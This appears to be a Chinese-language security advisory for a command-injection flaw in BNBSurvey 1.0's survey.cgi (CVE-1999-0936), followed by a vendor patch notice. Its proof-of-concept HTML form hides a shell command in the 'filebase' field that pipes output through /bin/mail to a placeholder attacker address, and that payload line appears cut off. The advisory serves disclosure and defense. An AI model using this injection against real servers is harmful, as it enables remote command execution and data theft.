BNB survey.cgi脚本远程执行任意命令漏洞
发布日期:1998-12-03
更新日期:1998-12-03
受影响系统:Big Nose Bird BNBSurvey 1.0
不受影响系统:Big Nose Bird BNBSurvey 3.0
描述:
BUGTRAQ ID:
1817
CVE(CAN) ID:
CVE-1999-0936
Survey.cgi是Big Nose Bird提供的一个基于Web的用于调查问卷的脚本。
Survey.cgi实现上存在一个输入验证漏洞,远程攻击者可能利用此漏洞在主机上以Web进程的权限执行任意命令。
脚本对于用户输入未做充分过滤,攻击者可能在输入中混入“|”、“>”、“<”等Shell管道符或重定向符来执行Shell命令。
<*链接:
http://www.cert.org/advisories/CA-1997-25.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<FORM METHOD="POST" ACTION="www.victim.com/cgi-bin/survey.cgi">
<input type=hidden name=action value="VOTE">
<input type=hidden name=filebase value="bleh; /bin/mail
you@your_email_address.com
<PRE>
Your Gender
<input type=radio name=ITEM1 value="0">Male
<input type=radio name=ITEM1 value="1">Female
<input type=radio name=ITEM1 value="2">Neuter
<INPUT TYPE="submit" VALUE="VOTE!">
建议:
厂商补丁:
Big Nose Bird
-------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Big Nose Bird BNBSurvey 1.0:
Big Nose Bird Upgrade BNBSurvey
ftp://ftp.bignosebird.com/survey.zip浏览次数:21389
严重程度:0(网友投票)